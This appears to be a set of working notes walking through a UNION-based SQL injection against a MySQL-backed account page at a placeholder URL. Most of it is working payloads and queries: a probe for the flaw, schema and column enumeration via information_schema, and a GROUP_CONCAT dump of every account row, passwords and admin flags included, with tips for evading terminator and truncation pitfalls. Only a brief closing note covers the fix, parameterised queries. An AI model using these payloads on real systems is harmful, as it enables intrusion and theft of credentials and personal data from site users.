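-- MySQL UNION-based SQL injection walkthrough (working notes).
--
-- Target:  www.your_page.com/account.php?username=xxx
-- Assumed back-end query, with the username parameter concatenated into the
-- SQL string unescaped (this is the root cause; remediation is at the end):
--   SELECT username, mysignature FROM accounts WHERE username = 'xxx';
--
-- Probe: break out of the string literal. A database error, or a changed page
-- for this request, indicates the parameter reaches the query unescaped:
--   www.your_page.com/account.php?username=xxx'
--
-- Notes that apply to every payload below:
--   * The injected SELECT must produce exactly two columns, because the
--     original SELECT produces two (UNION column counts must match). Where a
--     second column is not needed it is padded with a duplicate or NULL.
--   * MySQL's "--" comment requires a following whitespace character. At the
--     very end of a URL that trailing %20 is easy to lose (browsers/proxies may
--     trim it); "--+", "-- -" or "%23" (#) are more robust terminators.
--   * Quote characters should be percent-encoded as %27 in a real request; the
--     URL lines here keep the literal quote for readability.
--   * The trailing comment swallows the original query's closing quote and
--     whatever follows it. A ";" before the comment is not needed for the UNION
--     to work and is omitted so the payload does not depend on how the server
--     treats a trailing statement separator.

-- Step 1: guess that accounts has a password column and read it via UNION.
-- Resulting query:
--   SELECT username, mysignature FROM accounts WHERE username = 'xxx'
--   UNION SELECT username, password FROM accounts -- ';
-- Payload (URL-encoded):
--   www.your_page.com/account.php?username=xxx'%20UNION%20SELECT%20username,password%20FROM%20accounts%20--%20
-- If this works, stop guessing column names and enumerate them instead.

-- Step 2: confirm the current schema name (duplicated to fill two columns).
SELECT DATABASE(), DATABASE();
-- Resulting query:
--   SELECT username, mysignature FROM accounts WHERE username = 'xxx'
--   UNION SELECT DATABASE(),DATABASE() -- ';
-- Payload:
--   www.your_page.com/account.php?username=xxx'%20UNION%20SELECT%20DATABASE(),DATABASE()%20--%20

-- Step 3: enumerate the columns of accounts from information_schema.
-- Filter on table_schema as well as table_name: without it, a same-named
-- table in another database on the server would mix its columns into the
-- result.
SELECT column_name, column_name
FROM information_schema.columns
WHERE table_schema = DATABASE()
  AND table_name = 'accounts';
-- Resulting query:
--   SELECT username, mysignature FROM accounts WHERE username = 'xxx'
--   UNION SELECT column_name,column_name FROM information_schema.columns
--   WHERE table_schema=DATABASE() AND table_name='accounts' -- ';
-- Payload:
--   www.your_page.com/account.php?username=xxx'%20UNION%20SELECT%20column_name,column_name%20FROM%20information_schema.columns%20WHERE%20table_schema=DATABASE()%20AND%20table_name='accounts'%20--%20

-- Step 4: dump every row into a single string so it fits the two-column shape.
-- Column names (cid, is_admin, firstname, lastname, ...) come from step 3.
-- Caveats:
--   * GROUP_CONCAT output is silently truncated at group_concat_max_len
--     (1024 bytes by default), so a larger table must be read in pages
--     (LIMIT/OFFSET in a subquery) or with a raised limit.
--   * CONCAT() returns NULL if any input is NULL, which drops that row from
--     the output; wrap nullable columns in COALESCE() if rows go missing.
SELECT
    GROUP_CONCAT(
        CONCAT(cid, '-', username, '-', password, '-', mysignature, '-',
               is_admin, '-', firstname, '-', lastname)
        SEPARATOR '/'
    ),
    NULL
FROM accounts;
-- Resulting query:
--   SELECT username, mysignature FROM accounts WHERE username = 'xxx'
--   UNION SELECT group_concat(concat(cid,'-',username,'-',password,'-',mysignature,'-',is_admin,'-',firstname,'-',lastname) SEPARATOR '/'), null
--   FROM accounts -- ';
-- Payload:
--   www.your_page.com/account.php?username=xxx'%20UNION%20SELECT%20group_concat(concat(cid,'-',username,'-',password,'-',mysignature,'-',is_admin,'-',firstname,'-',lastname)%20SEPARATOR%20'/'),%20null%20FROM%20accounts%20--%20

-- Remediation: bind username as a parameter (mysqli/PDO prepared statement)
-- instead of concatenating it into the query string. None of the payloads
-- above work against a bound parameter, because the value can no longer close
-- the string literal or introduce a UNION.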
# note – 22.11.2016 – UNION-based SQL injection notes – MySQL